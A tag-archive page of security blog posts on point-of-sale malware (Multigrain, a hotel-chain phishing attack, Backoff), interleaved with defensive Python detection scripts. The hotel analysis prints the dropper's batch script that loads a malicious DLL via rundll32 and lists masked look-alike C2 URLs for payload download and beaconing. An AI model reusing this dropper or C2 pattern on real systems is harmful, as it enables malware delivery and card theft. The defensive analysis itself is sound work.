Tag Archives: POS

Point of Sale attacks through Terminal Server


Some months ago we published a technical analysis of Multigrain, a Point of Sale Trojan that uses DNS requests to exfiltrate stolen information. We also wrote about a case where this PoS malware was used to infect hundreds of restaurants in the United States.

At the end of September we saw renewed activity, with new Multigrain variants infecting PoS systems. However, unlike the previous attack, which targeted the same kind of victim in a single region (restaurants in the US), the cybercriminals now appear to be looking for new fields in which to maximize their profit. We have seen two waves of attacks whose victims were companies from a number of countries:

  • Argentina
  • Belgium
  • Brazil
  • Chile
  • France
  • Germany
  • India
  • Ireland
  • Norway
  • Spain
  • Sweden
  • Thailand
  • UK
  • USA

They were from different industries, including the usual restaurants and hotels, but also others not that common in these attacks: Telecommunications, Business IT Services, Engineering, Cargo Insurance, Medical Services, Logistics, Accountants, Unions, and Engineering and Industrial Machinery Suppliers.

Why the disparity in victim profiles? It looks like the attackers were not looking for these specific industries. All attacks were perpetrated through Terminal Server, similar to what we have seen in other cases, using brute-force attacks until they break into the computers and infect them with Multigrain. These are automated attacks: cybercriminals scan the Internet looking for potential victims and, once one is located, keep attacking until they gain access.

Tips to prevent attacks in companies

In order to minimize the risk, companies must remember that these services are better kept off the Internet whenever possible. If they must be exposed, be sure to use strong credentials (with a strong enough password you can basically avoid brute-force attacks), use 2FA when possible, use non-standard ports, and of course monitor all incoming connections from the outside.
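The monitoring that the tips above call for can be expressed as a small detection rule. The following is an added example (not Panda's code) that looks for the Terminal Server password-guessing pattern in Windows Security logon events: a burst of failed RemoteInteractive logons (event 4625, logon type 10) from one source, followed by a successful one (4624) from that same source, which is the moment the brute force has worked. The event lines are a constructed, simplified layout rather than real Event Log XML, and the addresses are made up.

```python
"""Added example: spot password guessing against Terminal Server (RDP) logons
and the successful logon that follows it, from Windows Security event data."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in a simplified "timestamp event_id key=value ..." layout
# (not real Event Log XML). 4625 = failed logon, 4624 = successful logon,
# LogonType=10 = RemoteInteractive, i.e. Terminal Server / Remote Desktop.
# 198.51.100.7 plays the Internet-facing attacker; 10.0.0.5 is a staff PC.
SAMPLE_EVENTS = """
2016-09-28T02:14:01Z 4625 LogonType=10 User=administrator Src=198.51.100.7
2016-09-28T02:14:02Z 4625 LogonType=10 User=administrator Src=198.51.100.7
2016-09-28T02:14:03Z 4625 LogonType=10 User=admin Src=198.51.100.7
2016-09-28T02:14:04Z 4625 LogonType=3 User=admin Src=198.51.100.7
2016-09-28T02:14:05Z 4625 LogonType=10 User=pos Src=198.51.100.7
2016-09-28T02:14:06Z 4625 LogonType=10 User=administrator Src=198.51.100.7
2016-09-28T02:14:07Z 4625 LogonType=10 User=administrator Src=198.51.100.7
2016-09-28T02:14:09Z 4624 LogonType=10 User=administrator Src=198.51.100.7
2016-09-28T08:01:10Z 4625 LogonType=10 User=jsmith Src=10.0.0.5
2016-09-28T08:01:25Z 4624 LogonType=10 User=jsmith Src=10.0.0.5
"""

LINE_RE = re.compile(r"^(\S+) (\d{4}) LogonType=(\d+) User=(\S+) Src=(\S+)$")


def parse_events(text):
    """Turn the sample lines into dicts sorted by time; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, eid, ltype, user, src = m.groups()
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "id": int(eid),
            "logon_type": int(ltype),
            "user": user,
            "src": src,
        })
    return sorted(events, key=lambda e: e["time"])


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Return alerts as tuples, in time order.

    ("bruteforce", src, failures, time): `threshold` or more failed RDP logons
        from one source inside `window`; this is the burst an account-lockout
        policy with the same threshold would stop.
    ("success_after_failures", src, user, time): a successful RDP logon from a
        source that already tripped the rule, i.e. the guessing worked and the
        account should be treated as compromised.
    """
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    flagged = set()               # sources already reported as brute-forcing
    alerts = []
    for e in events:
        if e["logon_type"] != 10:
            continue              # only Terminal Server / RDP logons matter here
        q = recent[e["src"]]
        if e["id"] == 4625:
            q.append(e["time"])
            while q and e["time"] - q[0] > window:
                q.popleft()       # slide the window forward
            if len(q) >= threshold and e["src"] not in flagged:
                flagged.add(e["src"])
                alerts.append(("bruteforce", e["src"], len(q), e["time"]))
        elif e["id"] == 4624 and e["src"] in flagged:
            alerts.append(("success_after_failures", e["src"], e["user"], e["time"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The threshold and window are the same two numbers you would put into an account-lockout policy; running the rule with the policy's values shows which sources the lockout would have stopped, while the second alert type is the one worth paging on, because a success after a burst of failures means the credential is now in the attacker's hands.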

 

The post Point of Sale attacks through Terminal Server appeared first on Panda Security Mediacenter.

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

[Screenshot: the hotel reservation form displayed when the file is executed]

This is a hotel reservation form that is to be filled out by a customer; the customer has written in their payment information for a stay at the end of May 2016. As you can see, nothing looks unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely we see that the file came out of a zip, and although it displays a Word icon, it is an executable file.
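The lure works because the icon is trusted instead of the bytes. The following is an added example (not part of Panda's analysis) of the check a mail gateway or analyst script can apply to a zipped attachment: open the archive in memory, and for each member judge it by its first bytes and its full name rather than its icon, flagging PE executables, document-looking names with PE content, executable extensions, and double extensions such as Form.docx.exe. The archive it inspects is constructed here with a fake MZ header, not the real dropper; the only value taken from the analysis is the published MD5 of adobeUpd.dll, which the constructed sample does not match.

```python
"""Added example: triage a zipped mail attachment for an executable posing as a
document, the lure described above (name and icon say Word, bytes say PE)."""
import hashlib
import io
import zipfile

DOCUMENT_EXTENSIONS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf", ".txt"}
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".cmd", ".bat", ".dll", ".js", ".vbs"}
# MD5 of adobeUpd.dll as published in the analysis; a match means a known sample.
KNOWN_BAD_MD5 = {"a213e36d3869e626d4654bce67f6760c"}


def split_ext(name):
    lower = name.lower()
    if "." not in lower:
        return lower, ""
    stem, ext = lower.rsplit(".", 1)
    return stem, "." + ext


def classify_member(name, content):
    """Findings for one archive member, judged by its name and its bytes, not its icon."""
    findings = []
    stem, ext = split_ext(name)
    is_pe = content.startswith(b"MZ")           # DOS/PE header: a Windows executable
    if is_pe:
        findings.append("pe_executable")
    if is_pe and ext in DOCUMENT_EXTENSIONS:
        findings.append("document_name_with_pe_content")
    if ext in EXECUTABLE_EXTENSIONS:
        findings.append("executable_extension")
    if any(stem.endswith(d) for d in DOCUMENT_EXTENSIONS):
        findings.append("double_extension")      # e.g. Form.docx.exe
    if hashlib.md5(content).hexdigest() in KNOWN_BAD_MD5:
        findings.append("known_bad_hash")
    return findings


def triage_zip(data):
    """Inspect every member of an in-memory zip; returns {member_name: [findings]}."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            report[info.filename] = classify_member(info.filename, zf.read(info))
    return report


def verdict(report):
    return "block" if any(report.values()) else "allow"


def build_sample_zip():
    """Constructed sample archive: a fake PE named like a reservation form, a fake
    PE with a .pdf name, a genuine-looking .docx (a docx is itself a zip, hence PK)
    and a harmless text note. None of this is the real dropper."""
    fake_pe = b"MZ" + b"\x90" * 62 + b"constructed, not a real executable"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Hotel_Reservation_Form.docx.exe", fake_pe)
        zf.writestr("Invoice.pdf", fake_pe)
        zf.writestr("ROCA.ING.docx", b"PK\x03\x04" + b"constructed placeholder")
        zf.writestr("readme.txt", b"Thanks for your booking")
    return buf.getvalue()


if __name__ == "__main__":
    report = triage_zip(build_sample_zip())
    for member, findings in report.items():
        print(member, findings or "clean")
    print("verdict:", verdict(report))
```

A single finding is enough to block: a zip that carries any PE at all has no business arriving as a reservation form, and the double-extension check catches the case where the displayed name ends in .docx only because Explorer hides the real extension.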

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off
REM Open the decoy reservation document so the victim sees what they expected
start "" ROCA.ING.docx
REM Work out whether this is 64-bit or 32-bit Windows
Set xOS=x64
If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
REM Load the dropped DLL through rundll32.exe and call its "Wenk" export
REM (SysWOW64 holds the 32-bit rundll32 on 64-bit Windows)
IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
REM Pause for roughly 12 seconds before the script exits
ping -n 12 localhost

As we can see, the first thing it does is open the Word document so the victim sees what they expected, completing the trick. Then adobeUpd.dll is run with the parameter “Wenk”. When executed, it modifies the file, marks it as read-only and hidden, and creates an entry in the Windows registry so that it runs every time the computer is turned on.
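The dropper's rundll32.exe adobeUpd.dll,Wenk call is a good example of a launch that process telemetry can catch on its own, before any network activity. The following is an added example (not Panda's code) that runs over constructed process-creation records in a simple time|parent|image|command_line layout: it parses the DLL and export out of each rundll32 command line and flags DLLs given as a bare relative name (resolved from the working directory, here the unpacked zip) or located outside the Windows system directories, and notes when a script host such as cmd.exe was the parent. The third record mirrors the call in reader_sl.cmd; the Office path and the last record (a DLL under a user profile) are assumptions added to show the check generalises.

```python
"""Added example: flag rundll32 launches whose DLL lives outside the Windows
directories, the pattern in reader_sl.cmd above (rundll32.exe adobeUpd.dll,Wenk),
over constructed process-creation records."""
import ntpath
import re

# Constructed records, one per line: time|parent_image|image|command_line.
# The third line mirrors the dropper's rundll32 call; the last is a second
# assumed case (a DLL under a user profile) to show the path check generalises.
SAMPLE_PROCESS_EVENTS = r"""
2016-05-20T10:02:11Z|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|cmd /c reader_sl.cmd
2016-05-20T10:02:12Z|C:\Windows\System32\cmd.exe|C:\Program Files\Microsoft Office\Office15\WINWORD.EXE|"WINWORD.EXE" /n ROCA.ING.docx
2016-05-20T10:02:12Z|C:\Windows\System32\cmd.exe|C:\Windows\SysWOW64\rundll32.exe|C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk
2016-05-20T10:30:00Z|C:\Windows\explorer.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL
2016-05-20T11:00:00Z|C:\Windows\System32\svchost.exe|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\clerk\AppData\Roaming\upd.dll,Start
"""

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
ARGS_RE = re.compile(r'^\s*(?:"[^"]*"|\S+)\s*(.*)$')   # drop the image token, keep arguments


def parse_process_events(text):
    events = []
    for line in text.splitlines():
        parts = line.strip().split("|", 3)
        if len(parts) == 4:
            events.append(dict(zip(("time", "parent", "image", "cmdline"), parts)))
    return events


def rundll32_target(cmdline):
    """Return (dll, export) from a rundll32 command line, or None if there is no DLL argument."""
    m = ARGS_RE.match(cmdline)
    if not m or not m.group(1).strip():
        return None
    first_arg = m.group(1).split()[0]
    dll, _, export = first_arg.partition(",")
    return dll, export or None


def assess_rundll32(event):
    """None for non-rundll32 processes; otherwise a dict with the reasons it looks odd."""
    if ntpath.basename(event["image"]).lower() != "rundll32.exe":
        return None
    target = rundll32_target(event["cmdline"])
    if target is None:
        return None
    dll, export = target
    reasons = []
    d = dll.lower()
    if ntpath.dirname(d) == "":
        reasons.append("relative_dll_path")          # resolved from the working directory (here: the unpacked zip)
    elif not d.startswith(SYSTEM_DIRS):
        reasons.append("dll_outside_system_dirs")    # user-writable location
    if ntpath.basename(event["parent"]).lower() in SCRIPT_HOSTS:
        reasons.append("launched_by_script_host")    # a .cmd/.vbs/.ps1 started it
    return {"time": event["time"], "dll": dll, "export": export, "reasons": reasons}


def find_suspicious_rundll32(events):
    hits = []
    for e in events:
        a = assess_rundll32(e)
        if a and a["reasons"]:
            hits.append(a)
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_rundll32(parse_process_events(SAMPLE_PROCESS_EVENTS)):
        print(hit)
```

Legitimate rundll32 use (the shell32.dll line) passes because the DLL sits under System32 and nothing scripted it; the dropper's call fails both tests, and the export name it records ("Wenk") is the string an analyst then looks for in the DLL.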

It then contacts a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

It downloads the response and checks whether it contains the user value passed in the URL parameter (iPmbzfAIRMFw). If it matches, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we tried to download it, it was not available; nor would it be found on our customer's system, since we blocked the infection attempt and the malware never ran there. The domain is identical to our customer's, except that theirs ends in “.com” while the attackers registered the same name under Gabon's “.ga”. Because of this similarity, the domain is unlikely to attract attention if the hotel's security team sees it while analyzing network traffic.

Although the file iPmbzfAIRMFw.jpg is not available, the code of adobeUpd.dll shows what it would do with it: look for a specific marker in the file, decrypt the data that follows it, and run the result as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll stays in a loop, connecting at random intervals of several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is aimed specifically at this hotel chain. The criminals have already removed all traces from the server the malware connected to, and since we aborted the attack we can only speculate about what they were going to do next. In our experience, this type of attack seeks to compromise one computer in the victim's enterprise and then move laterally to reach its ultimate goal: the point-of-sale terminals that process credit card payments, as we have seen in so many other cases.
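The ".com" versus ".ga" trick described above is exactly the kind of thing a proxy log review misses by eye but a script catches reliably. The following is an added example (not Panda's tooling) that splits each requested hostname into its registrable label and public suffix, and flags hosts whose label equals the organisation's own but under a different suffix, or is one character away from it. The organisation domain and log lines are constructed placeholders, since the real hotel's name is masked on the page; only the paths and query strings copy the published C2 URLs. The two-label suffix table is a stand-in for the Public Suffix List.

```python
"""Added example: flag outbound requests to domains that imitate the organisation's
own domain, as the ".com" vs ".ga" pair above, over constructed proxy log lines."""
import re
from urllib.parse import urlparse

# Organisation domain and log lines are constructed placeholders; the real hotel's
# name is masked on the page. Path and query strings copy the published C2 URLs.
ORG_DOMAIN = "grandhotel-example.com"
SAMPLE_PROXY_LOG = """
2016-05-20T10:02:15Z 10.20.1.15 http://www.grandhotel-example.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw
2016-05-20T10:02:16Z 10.20.1.15 http://www.grandhotel-example.ga/en/scripts/iPmbzfAIRMFw.jpg
2016-05-20T10:05:00Z 10.20.1.20 https://www.grandhotel-example.com/booking
2016-05-20T10:06:00Z 10.20.1.21 https://mail.grandhotel-example.co.uk/
2016-05-20T10:07:00Z 10.20.1.22 https://www.grandhote1-example.com/
2016-05-20T10:08:00Z 10.20.1.23 https://example.org/
"""

# Two-label public suffixes handled here; production code would use the Public Suffix List.
TWO_LABEL_SUFFIXES = {"co.uk", "com.br", "com.ar", "co.in"}
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+)$")


def registrable(host):
    """Split a hostname into (registrable label, public suffix), e.g. www.x.co.uk -> ("x", "co.uk")."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None
    last_two = ".".join(labels[-2:])
    if last_two in TWO_LABEL_SUFFIXES and len(labels) >= 3:
        return labels[-3], last_two
    return labels[-2], labels[-1]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character look-alikes (grandhote1 vs grandhotel)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(host, org_domain):
    """Why `host` resembles `org_domain`, or None (the organisation's own domain is not a hit)."""
    org, h = registrable(org_domain), registrable(host)
    if not org or not h:
        return None
    (org_label, org_suffix), (label, suffix) = org, h
    if label == org_label and suffix != org_suffix:
        return "same_name_different_tld"
    if label != org_label and edit_distance(label, org_label) == 1:
        return "one_edit_from_org_name"
    return None


def scan_proxy_log(text, org_domain):
    """Return one hit per log line whose host imitates org_domain."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, url = m.groups()
        host = urlparse(url).hostname or ""
        reason = lookalike_reason(host, org_domain)
        if reason:
            hits.append({"time": ts, "client": client, "host": host, "reason": reason})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG, ORG_DOMAIN):
        print(hit)
```

The same logic can run against DNS query logs, and legitimately owned variants (a .co.uk the company really registered) belong on an allowlist rather than in the suffix table; everything else that matches the organisation's name under a foreign TLD deserves a look at who registered it and when.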

Traditional anti-virus does not work against this type of attack, since these threats are created specifically for one victim and the attackers always make sure the malware is not detected by the signatures, proactive technologies, etc. built into current anti-malware solutions. That is why EDR (Endpoint Detection & Response) services equipped with advanced protection technology are vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Bad news for SMBs: Target’s “Backoff” malware attack hits 1,000 more businesses

[Image: avast! Endpoint Protection can protect your network]

U.S. merchants advised to protect themselves against same PoS hack that hit Target and Neiman Marcus last year.

More than 1,000 U.S. businesses have had their systems infected by Backoff, a point-of-sale (PoS) malware that was linked to the remote-access attacks against Target, Michaels, and P.F. Chang’s last year and more recently, UPS and Dairy Queen. In the Target breach alone, 40 million credit and debit cards were stolen, along with 70 million records which included the name, address, email address, and phone number of Target shoppers.

The way these breaches occur is laid out in BACKOFF: New Point of Sale Malware, a new U.S. Department of Homeland Security (DHS) report. Investigations reveal that cybercrooks use readily available tools to identify businesses that use remote desktop applications which allow a user to connect to a computer from a remote location. The Target breach began with stolen login credentials from the air-conditioning repairman.

Once the business is identified, the hackers use brute force to break into the login feature of the remote desktop solution. After gaining access to administrator or privileged access accounts, the cybercrooks are then able to deploy the PoS malware and steal consumer payment data. If that’s not enough, most versions of Backoff have keylogging functionality and can also upload discovered data, update the malware, download/execute further malware, and uninstall the malware.

General steps SMBs and consumers can take to protect themselves

  • You should use a proper security solution, like avast! Endpoint Protection, to protect your network from hacking tools, malicious modules, and from hackers using exploits as a gateway to insert malware into your network.
  • Regularly monitor your bank and credit card statements to make sure all the transactions are legitimate.
  • Change default and staff passwords controlling access to key payment systems and applications. Our blog post, Do you hate updating your passwords whenever there’s a new hack?, has some tips.
  • Monitor your credit report for any changes. You’re entitled to one free report per year from each of the three reporting agencies.

Specific tips to protect your business and customers

Remote Desktop Access

  • Configure the account lockout settings to lock a user account after a period of time or a specified number of failed login attempts.
  • Limit the number of users and workstations who can log in using Remote Desktop.
  • Use firewalls to restrict access to remote desktop listening ports.

Network Security

  • Review firewall configurations and ensure that only allowed ports, services and Internet protocol (IP) addresses are communicating with your network.
  • Segregate payment processing networks from other networks.
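The Remote Desktop and Network Security items above (restrict who may reach the remote desktop listening port, allow only approved addresses and services, segregate the payment network) can be written down as a policy and checked against real connection records. The following is an added example, not DHS or Avast material, that encodes such a policy with Python's ipaddress module and audits a handful of constructed flow records; every address, range and port assignment in it is made up and stands in for your own network.

```python
"""Added example: audit connection records against a PoS segmentation and
Remote Desktop exposure policy, the list items above turned into a check.
All addresses and ranges are constructed; adapt them to your own network."""
import ipaddress

RDP_PORT = 3389
POS_SEGMENT = ipaddress.ip_network("10.20.0.0/24")            # cash registers / PoS terminals
ADMIN_VLAN = ipaddress.ip_network("10.10.5.0/24")             # the only place RDP may come from
CORPORATE_RANGES = [ipaddress.ip_network("10.0.0.0/8")]       # everything else is "outside"
ALLOWED_RDP_SOURCES = [ADMIN_VLAN]
ALLOWED_POS_PEERS = [                                         # who may talk to / from the PoS segment
    POS_SEGMENT,
    ADMIN_VLAN,
    ipaddress.ip_network("203.0.113.10/32"),                  # payment gateway (constructed)
]

# Constructed flow records: (source, destination, destination port).
SAMPLE_FLOWS = [
    ("10.10.5.12", "10.20.0.7", 3389),     # admin RDP into a register: allowed
    ("198.51.100.7", "10.20.0.7", 3389),   # Internet host trying RDP straight at a register
    ("10.30.1.4", "10.20.0.7", 3389),      # office PC (not admin VLAN) using RDP to a register
    ("10.20.0.7", "203.0.113.10", 443),    # register talking to the payment gateway: allowed
    ("10.20.0.7", "198.51.100.99", 53),    # register sending DNS to an unknown Internet host
    ("10.30.1.4", "10.30.1.9", 445),       # office traffic, nothing to do with PoS
]


def in_any(ip, networks):
    return any(ip in net for net in networks)


def check_flow(src, dst, dport):
    """Policy violations for one flow, as a list of short reason codes (empty = compliant)."""
    src, dst = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    violations = []
    if dport == RDP_PORT and not in_any(src, ALLOWED_RDP_SOURCES):
        violations.append("rdp_from_unapproved_source")
        if not in_any(src, CORPORATE_RANGES):
            violations.append("rdp_reachable_from_outside")   # the listener is exposed to the Internet
    if dst in POS_SEGMENT and not in_any(src, ALLOWED_POS_PEERS):
        violations.append("unapproved_peer_into_pos_segment")
    if src in POS_SEGMENT and not in_any(dst, ALLOWED_POS_PEERS):
        violations.append("pos_host_to_unapproved_peer")      # segmentation leak, possible exfil path
    return violations


def audit(flows):
    """Return [(flow, violations)] for every non-compliant flow, in input order."""
    findings = []
    for flow in flows:
        v = check_flow(*flow)
        if v:
            findings.append((flow, v))
    return findings


if __name__ == "__main__":
    for flow, v in audit(SAMPLE_FLOWS):
        print(flow, v)
```

Feed it firewall or NetFlow exports and the "rdp_reachable_from_outside" finding tells you the listening port is still exposed, while "pos_host_to_unapproved_peer" is the one to watch after the fact, since a register should never be talking to anything but the gateway and the admin network.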

Cash Register and PoS Security

  • Implement hardware-based point-to-point encryption. It is recommended that EMV-enabled PIN entry devices or other credit-only accepting devices have Secure Reading and Exchange of Data (SRED) capabilities.
  • Install Payment Application Data Security Standard-compliant payment applications.
  • Deploy the latest version of an operating system and ensure it is up to date with security patches, anti-virus software, file integrity monitoring and a host-based intrusion-detection system.

See more mitigation and prevention strategies from DHS.

Learn more about PoS attacks against small and medium-sized businesses in our blog post, Should small and medium-sized businesses be worried about PoS attacks?

Thank you for using avast! Antivirus and recommending us to your friends and family. For all the latest news, fun and contest information, please follow us on Facebook, Twitter, Google+ and Instagram. Business owners – check out our business products.